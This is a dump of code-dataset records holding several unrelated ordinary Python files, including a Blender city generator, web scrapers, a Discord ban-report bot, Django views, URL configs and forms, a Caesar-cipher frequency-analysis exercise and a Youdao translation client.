None\nmaxAreaBuilding = None\nminAreaBuilding = None\ndensityFactor = None\ngreenZone = None\nUV = None\n \nf = open(\"controlParameters.txt\", \"r\")\n \nfor line in f:\n params = line.split()\n if params[0]=='x':\n xDimension = float(params[1])\n elif params[0] == 'y':\n yDimension = float(params[1])\n elif params[0] == 'Primary_street_size':\n primaryStreetSize = float(params[1])\n elif params[0] == 'Secondary_street_size':\n secondaryStreetSize = float(params[1])\n elif params[0] == 'District_height':\n districtHeihgt = float(params[1])\n elif params[0] == 'District_width':\n districtWidth = float(params[1])\n elif params[0] == 'Neighborhood_height':\n neighborhoodHeight = float(params[1])\n elif params[0] == 'Neighborhood_width':\n neighborhoodWidth = float(params[1])\n elif params[0] == 'Maximum_buidings_area':\n maxAreaBuilding = float(params[1])\n elif params[0] == 'Minimum_buidings_area':\n minAreaBuilding = float(params[1])\n elif params[0] == 'Density':\n densityFactor = float(params[1])\n elif params[0] == 'Green_zone':\n greenZone = float(params[1])\n elif params[0] == 'UV':\n UV = float(params[1])\n \nif(xDimension != None and\n yDimension != None and\n primaryStreetSize != None and\n secondaryStreetSize != None and\n districtHeihgt != None and\n districtWidth != None and\n neighborhoodHeight != None and\n neighborhoodWidth != None and\n maxAreaBuilding != None and\n minAreaBuilding != None and\n densityFactor != None and\n greenZone != None and\n UV != None):\n if UV == 1: \n city(xDimension,\n yDimension,\n primaryStreetSize,\n secondaryStreetSize,\n districtHeihgt,\n districtWidth,\n neighborhoodHeight,\n neighborhoodWidth,\n maxAreaBuilding,\n minAreaBuilding,\n densityFactor,\n greenZone,\n 1)\n else:\n city(xDimension,\n yDimension,\n primaryStreetSize,\n secondaryStreetSize,\n districtHeihgt,\n districtWidth,\n neighborhoodHeight,\n neighborhoodWidth,\n maxAreaBuilding,\n minAreaBuilding,\n densityFactor,\n greenZone,\n 0)\nelse:\n print('Parameter Error: some parameters are 
invalid')\n", "sub_path": "city.py", "file_name": "city.py", "file_ext": "py", "file_size_in_byte": 8580, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "primaryStreets.PrimaryStreets", "line_number": 53, "usage_type": "call"}, {"api_name": "secundaryStreets.SecundaryStreets", "line_number": 57, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 63, "usage_type": "call"}, {"api_name": "sidewalk.Sidewalk", "line_number": 66, "usage_type": "call"}, {"api_name": "sidewalk.material2", "line_number": 68, "usage_type": "call"}, {"api_name": "sidewalk.material", "line_number": 70, "usage_type": "call"}, {"api_name": "greenZone.GreenZone", "line_number": 73, "usage_type": "call"}, {"api_name": "sidewalk.face", "line_number": 73, "usage_type": "attribute"}, {"api_name": "subdivision.Subdivision", "line_number": 77, "usage_type": "call"}, {"api_name": "sidewalk.face", "line_number": 77, "usage_type": "attribute"}, {"api_name": "building.Building", "line_number": 97, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 97, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 99, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 101, "usage_type": "call"}, {"api_name": "building.Building", "line_number": 104, "usage_type": "call"}, {"api_name": "bpy.ops.object.lamp_add", "line_number": 111, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 112, "usage_type": "attribute"}, {"api_name": "mathutils.Vector", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "506780611", "text": "from bs4 import BeautifulSoup\nfrom bs4 import SoupStrainer\n\nimport requests\n\nimport csv\n\nwith open(\"Log_Links_3.csv\",\"r\") as links:\n with open('OTRSiteScrape2.txt','w') as outfile: \n\n show_links = []\n \n for row in links:\n show_links.append(row)\n \n link = iter(show_links)\n num_links = len(show_links)\n \n url = show_links[0]\n print(url)\n object_page = requests.get(url)\n html = object_page.text\n \n soup = BeautifulSoup(html, \"html5lib\")\n only_font_tags = SoupStrainer(\"font\") \n \n font_3 = soup.find_all(\"font\", attrs={\"size\":\"3\"})\n font_5 = soup.find_all(\"font\", attrs={\"size\":\"5\"})\n font_3_string = str(font_3)\n font_5_string = str(font_5)\n \n if font_5:\n outfile.write(font_5_string)\n outfile.write(font_3_string)\n # print(font_5_string)\n \n try:\n url = next(link)\n print(url)\n except:\n print (\"error\")\n \n ", "sub_path": "Extras/V4_OTRSite_Log_Scrape_Pt_2.py", "file_name": "V4_OTRSite_Log_Scrape_Pt_2.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "bs4.SoupStrainer", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "453406266", "text": "\"\"\"\nWebsocket receiver class.\n\"\"\"\nimport json\n\nimport discord\nimport websockets\nfrom dbansbot import consts\n\n\ndef create_message(report: dict, 
server: discord.Server):\n \"\"\"\n Creates a message to send from report data.\n \"\"\"\n # Create the message to send.\n msg = \"\"\"**{type_} | Number #{data[number]}\\u200b**\n**Victim**: {victim}\n\"\"\"\n # Get the fields.\n type_ = consts.ReportType(report[\"type\"]).name.capitalize()\n # Check if the report is 'active' and the type is ban.\n # If it isn't, the type is actually 'unban'.\n # Get the victim details.\n _victim = server.get_member(str(report[\"victim\"][\"discord_id\"]))\n if _victim is None:\n # Use the state instead.\n uname = report.get(\"state\", {}).get(\"username\", \"Unknown...\")\n discrim = report.get(\"state\", {}).get(\"discriminator\", \"????\")\n victim = \"{}#{}\".format(uname, discrim)\n else:\n victim = str(_victim)\n\n built = msg.format(data=report, type_=type_, victim=str(victim))\n\n # Check if there's an owner key.\n if report[\"owner\"][\"discord_id\"] is None:\n built += \"Responsible moderator, please claim with `==| reports claim {} `\\n\".format(\n report[\"number\"])\n else:\n owner = server.get_member(str(report[\"owner\"][\"discord_id\"]))\n built += \"**Owner:** {}\\n\".format(str(owner))\n built += \"**Reason:** {}\".format(report[\"reason\"])\n\n return built\n\n\nclass WSReceiver:\n def __init__(self, bot):\n self.bot = bot\n\n self.ws = None\n\n async def check_server_audit(self, server: discord.Server):\n \"\"\"\n Checks to see if this server is eligible for audit log.\n\n Returns a two-item tuple:\n If eligible (bool)\n The channel object if eligible\n \"\"\"\n default = (False, None)\n\n # Check settings.\n status, js = await self.bot.get_api(\n consts.API_SETTINGS.format(server_id=server.id)\n )\n if status != 200:\n # Server probably isn't set up\n return default\n\n # Check the audit log status.\n settings = js[\"settings\"]\n audit_enabled = settings[\"audit\"][\"enabled\"]\n if not audit_enabled:\n # No audit log.\n return default\n\n # Load the audit log channel.\n channel = server.get_channel(str(settings[\"audit\"][\"id\"]))\n if channel is None:\n return default\n\n return True, channel\n\n async def dirty(self, dirty_data: list):\n \"\"\"\n Handles \"dirty\" objects.\n \"\"\"\n for report in dirty_data:\n assert isinstance(report, dict)\n\n # Get the server object.\n server = self.bot.get_server(str(report[\"discord_server_id\"]))\n if server is None:\n # ???\n continue\n\n eligible, channel = await self.check_server_audit(server)\n if not eligible:\n continue\n\n built = create_message(report, server)\n\n async for message in self.bot.logs_from(channel, limit=999999999):\n if 'Number #{}\\u200b'.format(report[\"number\"]) in message.content:\n # Edit the message w/ the new content.\n await self.bot.edit_message(message, built)\n return\n\n # If the old message couldn't be found, make a new message.\n await self.bot.send_message(channel, built)\n\n async def new(self, new_data: list):\n \"\"\"\n Handles \"new\" objects.\n \"\"\"\n for report in new_data:\n assert isinstance(report, dict)\n\n # Get the server object.\n server = self.bot.get_server(str(report[\"discord_server_id\"]))\n if server is None:\n # ???\n continue\n\n eligible, channel = await self.check_server_audit(server)\n if not eligible:\n continue\n\n built = create_message(report, server)\n # Send the message.\n await self.bot.send_message(channel, built)\n\n async def received(self, data: dict):\n data = data[\"data\"]\n\n dirty = data.get(\"dirty\", [])\n new = data.get(\"new\", [])\n\n # Process the dirty and new data as appropriate.\n await 
self.new(new)\n await self.dirty(dirty)\n\n async def poll(self):\n \"\"\"\n Poll repeatedly for new reports.\n \"\"\"\n while True:\n try:\n data = await self.ws.recv()\n except websockets.ConnectionClosed:\n self.bot.logger.error(\"Websocket closed connection! Cannot receive any more websocket data.\")\n return\n # Unpack the data.\n unpacked = json.loads(data)\n await self.received(unpacked)\n\n async def open_connection(self, url: str):\n \"\"\"\n Opens a connection to the websocket emitter.\n \"\"\"\n self.bot.logger.info(\"Connecting to {} as a listener...\".format(url))\n connection = await websockets.connect(url)\n\n if self.bot.shard_id is not None:\n id = \"dbans_bot_{}\".format(self.bot.shard_id)\n else:\n id = \"dbans_bot_0\"\n\n # Get the hello.\n await connection.recv()\n # Send an identify.\n await connection.send(json.dumps({\"token\": self.bot._api_token, \"subscribe\": [\"ALL\"], \"id\": id}))\n # Receive the OK.\n await connection.recv()\n self.bot.logger.info(\"Established websocket connection.\")\n\n self.ws = connection\n\n # Start polling.\n await self.poll()\n", "sub_path": "dbansbot/websocketr.py", "file_name": "websocketr.py", "file_ext": "py", "file_size_in_byte": 5600, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "discord.Server", "line_number": 11, "usage_type": "attribute"}, {"api_name": "dbansbot.consts.ReportType", "line_number": 20, "usage_type": "call"}, {"api_name": "dbansbot.consts", "line_number": 20, "usage_type": "name"}, {"api_name": "discord.Server", "line_number": 53, "usage_type": "attribute"}, {"api_name": "dbansbot.consts.API_SETTINGS.format", "line_number": 65, "usage_type": "call"}, {"api_name": "dbansbot.consts.API_SETTINGS", "line_number": 65, "usage_type": "attribute"}, {"api_name": "dbansbot.consts", "line_number": 65, "usage_type": "name"}, {"api_name": "websockets.ConnectionClosed", "line_number": 151, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 155, "usage_type": "call"}, {"api_name": "websockets.connect", "line_number": 163, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "421188067", "text": "import datetime\nimport re\n\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom models import Article\nimport models\nimport simplejson\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n\nOUT_FORMAT = '%B %d, %Y at %l:%M%P EDT'\n\ndef browse(request):\n articles = []\n models._refresh_metadata()\n for article in Article.objects.all():\n url = article.url\n if 'blogs.nytimes.com' in url: #XXX temporary\n continue\n elif 'editions.cnn.com' in url:\n continue\n vs = article.versions()\n nc = len(vs)\n if nc < 2:\n continue\n rowinfo = []\n lastcommit = None\n for date, commit in vs:\n if lastcommit is None:\n diffl = ''\n else:\n diffl = '../diffview?url=%s&v1=%s&v2=%s' % (url, lastcommit, commit)\n link = '../view?url=%s&v=%s' % (url, commit)\n rowinfo.append((link, diffl, date))\n lastcommit = commit\n rowinfo.reverse()\n (date, title, byline, publication) = article.metadata()\n articles.append((url, date, title, byline, publication, nc, rowinfo))\n articles.sort(key = lambda x: (x[-2] > 1, x[-1][0][2]), reverse=True)\n return render_to_response('browse.html', {'articles': articles})\n\n\ndef diffview(request):\n url = request.REQUEST.get('url')\n v1 = request.REQUEST.get('v1')\n v2 = request.REQUEST.get('v2')\n article = Article.objects.get(url=url)\n 
text1 = article.get_version(v1)\n text2 = article.get_version(v2)\n #url_template = 'view?url='+url+'&v=%s'\n title = article.metadata()[1]\n\n versions = article.versions()\n #index1 = [i for i, x in enumerate(versions) if x[1] == v1][0]\n #index2 = [i for i, x in enumerate(versions) if x[1] == v2][0]\n\n date1 = models.get_commit_date(v1).strftime(OUT_FORMAT)\n date2 = models.get_commit_date(v2).strftime(OUT_FORMAT)\n\n earlier1 = 1\n\n return render_to_response('diffview_templated.html', {\n 'title': title,\n 'date1':date1, 'date2':date2,\n 'text1':text1, 'text2':text2,\n 'article_url': url, 'v1': v1, 'v2': v2,\n 'form_action': 'upvote',\n })\n\ndef view(request):\n url = request.REQUEST.get('url')\n v = request.REQUEST.get('v')\n article = Article.objects.get(url=url)\n text = article.get_version(v)\n return HttpResponse(text, content_type='text/plain;charset=utf-8')\n\ndef upvote(request):\n article_url = request.REQUEST.get('article_url')\n diff_v1 = request.REQUEST.get('diff_v1')\n diff_v2 = request.REQUEST.get('diff_v2')\n remote_ip = request.META.get('REMOTE_ADDR')\n article_id = Article.objects.get(url=article_url).id\n models.Upvote(article_id=article_id, diff_v1=diff_v1, diff_v2=diff_v2, creation_time=datetime.datetime.now(), upvoter_ip=remote_ip).save()\n return render_to_response('upvote.html')\n \n\ndef about(request):\n return render_to_response('about.html', {})\n\ndef examples(request):\n return render_to_response('examples.html', {})\n\ndef contact(request):\n return render_to_response('contact.html', {})\n\ndef front(request):\n return render_to_response('front.html', {})\n\ndef subscribe(request):\n return render_to_response('subscribe.html', {})\n", "sub_path": "website/frontend/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3287, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "models._refresh_metadata", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Article.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Article.objects.get", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 47, "usage_type": "name"}, {"api_name": "models.get_commit_date", "line_number": 57, "usage_type": "call"}, {"api_name": "models.get_commit_date", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 62, "usage_type": "call"}, {"api_name": "models.Article.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 73, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 75, "usage_type": "call"}, {"api_name": "models.Article.objects.get", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 82, "usage_type": "name"}, {"api_name": "models.Upvote", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 83, 
"usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "attribute"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 88, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 91, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 94, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "440323037", "text": "# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('main.views',\n\t(r'^grappelli/', include('grappelli.urls')),\n\t(r'^admin/', include(admin.site.urls)),\n\t#main page\n\turl(r'^$', 'index_view',\n\t\t{'template_name':'main/index.html'},\n\t\tname='catalog_home'),\n\t# List of category\n\turl(r'^category/(?P[-\\w]+)/$', 'category_view',\n\t # {'template_name':'main/single_cat.html'},\n\t\tname='catalog_category'),\n\t# List of Porducts\n\turl(r'^product/(?P[-\\w]+)/$', 'product_view',\n\t\t{'template_name':'main/single_prod.html'},\n\t\tname='catalog_product'),\n\t#Search\n\turl(r'^search/$', 'prod_search',\n\t\t#{'template_name':'main/search.html'},\n\t\tname='catalog_search'),\n)\n\nfrom django.conf import settings\nurlpatterns += patterns('',\n\t(r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n)", "sub_path": "catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 994, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.urls.patterns", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "261820462", "text": "from flask import Flask, request, make_response, jsonify\r\nimport main_scrap\r\n\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n\r\n\r\n\r\n@app.route('/api/scrape_company', methods=['POST'])\r\ndef scrape_company():\r\n data = request.get_json() #data dans le body\r\n url = data[\"url\"] #url dans le body\r\n message = main_scrap.company_scraping(url)\r\n\r\n return message\r\n\r\n@app.route('/api/scrape_companies', 
methods=['GET'])\r\ndef scrape_companies():\r\n message = main_scrap.companies_scraping()\r\n\r\n return message\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n app.run(debug=True)", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "main_scrap.company_scraping", "line_number": 16, "usage_type": "call"}, {"api_name": "main_scrap.companies_scraping", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "196465752", "text": "# Use frequency analysis to find the key to ciphertext.txt, and then\n# decode it.\n\n# Your code here\n\nfrequencies = \"\"\"\n| E | 11.53 |\n| T | 9.75 |\n| A | 8.46 |\n| O | 8.08 |\n| H | 7.71 |\n| N | 6.73 |\n| R | 6.29 |\n| I | 5.84 |\n| S | 5.56 |\n| D | 4.74 |\n| L | 3.92 |\n| W | 3.08 |\n| U | 2.59 |\n| G | 2.48 |\n| F | 2.42 |\n| B | 2.19 |\n| M | 2.18 |\n| Y | 2.02 |\n| C | 1.58 |\n| P | 1.08 |\n| K | 0.84 |\n| V | 0.59 |\n| Q | 0.17 |\n| J | 0.07 |\n| X | 0.07 |\n| Z | 0.03 |\n\"\"\"\nimport re\n\nletter_to_freq = {}\nfor row in frequencies.split(\"\\n\"):\n m = re.match(r\"\\|\\s+(?P[A-Z])\\s+\\|\\s+(?P\\d+\\.\\d+)\\s+|\", row)\n if m and m.group(\"letter\") and m.group(\"number\"):\n letter_to_freq[m.group(\"letter\")] = float(m.group(\"number\"))/100.\n\nfreq_to_letter = {v: k for k, v in letter_to_freq.items()}\n\nwith open(\"ciphertext.txt\") as f:\n text = f.read()\n\nfrom collections import defaultdict\nletter_counts = defaultdict(lambda: 0)\nfor letter in text:\n letter = letter.upper()\n if 'A' <= letter and letter <= 'Z':\n letter_counts[letter] += 1\n\ndef get_closest(freq):\n return min(freq_to_letter.keys(), key=lambda x: abs(x-freq))\n\ntotal = sum(x for x in letter_counts.values())\nfor letter, count in letter_counts.items():\n freq = count/total\n closest = freq_to_letter[get_closest(freq)].lower()\n text = text.replace(letter, closest)\n\nprint(text)\n", "sub_path": "applications/crack_caesar/crack_caesar.py", "file_name": "crack_caesar.py", "file_ext": "py", "file_size_in_byte": 1651, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.match", "line_number": 38, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "523714767", "text": "#-*- coding: utf-8 -*-\nfrom django import forms\nfrom Etudiant.models import Etu\nfrom Matiere.models import Matiere\nfrom Annee.models import Annee\nfrom Semestre.models import Semestre\nfrom UE.models import UE\n\nclass FileForm(forms.Form):\n\tfichier = forms.FileField()\n\nclass SelectNote(forms.Form):\n\tdef __init__(self,*args,**kwargs):\n\t\tnotes = kwargs.pop('notes')\n\t\tsuper(SelectNote,self).__init__(*args,**kwargs)\n\t\tNoteChoices = [(note[0],note[1]) for note in notes]\n\t\tself.fields['select'] = forms.ChoiceField(widget=forms.Select(), choices=NoteChoices)\n\nclass RenseignerNote(forms.Form):\n\tdef __init__(self,*args,**kwargs):\n\t\tnotes = kwargs.pop('notes')\n\t\tsuper(RenseignerNote,self).__init__(*args,**kwargs)\n\n\t\tfor note in notes:\n\t\t\tprint(note)\n\t\t\tif note.valeur is None:\n\t\t\t\tself.fields[note.matiere.code] = 
forms.CharField(max_length=100,required=False)\n\t\t\telse:\n\t\t\t\tself.fields[note.matiere.code] = forms.CharField(max_length=100,required=False ,widget=forms.TextInput(attrs={'value': note.valeur}))\n\t\t\t\t\nclass CompleterResultat(forms.Form):\n\tdef __init__(self,*args,**kwargs):\n\t\tresSem = kwargs.pop('res')\n\t\tsuper(CompleterResultat,self).__init__(*args,**kwargs)\n\t\n\t\tif resSem.resultat_pre_jury is None:\n\t\t\tself.fields['Resultat pre-jury'] = forms.CharField(max_length=100,required=False)\n\t\telse:\n\t\t\tself.fields['Resultat pre-jury'] = forms.CharField(max_length=100,required=False ,widget=forms.TextInput(attrs={'value': resSem.resultat_pre_jury}))\n\n\t\tif resSem.resultat_jury is None:\n\t\t\tself.fields['Resultat jury'] = forms.CharField(max_length=100,required=False)\n\t\telse:\n\t\t\tself.fields['Resultat jury'] = forms.CharField(max_length=100,required=False ,widget=forms.TextInput(attrs={'value': resSem.resultat_jury}))\t", "sub_path": "Note/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1727, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.forms.Form", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 31, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 37, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 39, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 39, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 42, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 44, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "596416082", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n #index\n url(r'^$', 'index.views.index'),\n 
url(r'^main/', 'index.views.main'),\n url(r'^corporate/', 'index.views.corporate'),\n url(r'^bar/', 'index.views.bar'),\n url(r'^newyear/', 'index.views.newyear'),\n url(r'^hallmap/', 'index.views.hallmap'),\n url(r'^calc/', 'index.views.calc'),\n url(r'^photo/', 'index.views.photo'),\n url(r'^book/', 'index.views.book'),\n url(r'^contacts/', 'index.views.contacts'),\n url(r'^fastmessage/', 'index.views.fm'),\n #admin\n url(r'^admin/', include(admin.site.urls)),\n)\n", "sub_path": "core/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 677, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 3, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 3, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "604692650", "text": "# coding=utf-8\n\nimport urllib.request\nimport urllib.parse\nimport json\n\nurl = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule&smartresult=ugc&sessionFrom=null'\n\nhead = {}\nhead['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0'\n\ncontent = input(\"输入需要翻译的内容:\")\n\ndata = {}\ndata['action'] = 'FY_BY_CLICKBUTTON'\ndata['doctype'] = 'json'\ndata['i'] = content\ndata['keyfrom'] = 'fanyi.web'\ndata['type'] = 'AUTO'\ndata['typoResult'] = 'true'\ndata['ue'] = 'UTF-8'\ndata['xmlVersion'] = '1.8'\n\ndata = urllib.parse.urlencode(data).encode('utf-8')\n\nreq = urllib.request.Request(url, data, head)\nresponse = urllib.request.urlopen(req)\n\nhtml = response.read().decode('utf-8')\nresult = json.loads(html)\n\nprint('该翻译内容的结果是:' + result['translateResult'][0][0]['tgt'] + '\\n')\ntry:\n print('延伸翻译:')\n for i in result['smartResult']['entries']:\n print(i)\nexcept KeyError:\n print(\"找不到更多相关内容。\")", "sub_path": "Python_Store/Translate_youdao.py", "file_name": "Translate_youdao.py", "file_ext": "py", "file_size_in_byte": 1021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "urllib.request.parse.urlencode", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.request.parse", "line_number": 24, "usage_type": "attribute"}, 
{"api_name": "urllib.request", "line_number": 24, "usage_type": "name"}, {"api_name": "urllib.request.request.Request", "line_number": 26, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 26, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 26, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 27, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 27, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 27, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "112095467", "text": "# coding: utf-8\n\n\"\"\"\n Memsource REST API\n\n Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](). # noqa: E501\n\n OpenAPI spec version: Latest\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom memsource_cli.models.comment_dto import CommentDto # noqa: F401,E501\nfrom memsource_cli.models.status_dto import StatusDto # noqa: F401,E501\n\n\nclass CommonConversationDto(object):\n \"\"\"NOTE: This class is auto generated by the 